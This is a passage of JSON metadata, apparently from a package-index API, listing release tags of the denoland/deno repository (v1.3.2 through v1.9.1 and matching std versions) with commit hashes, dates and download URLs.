T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub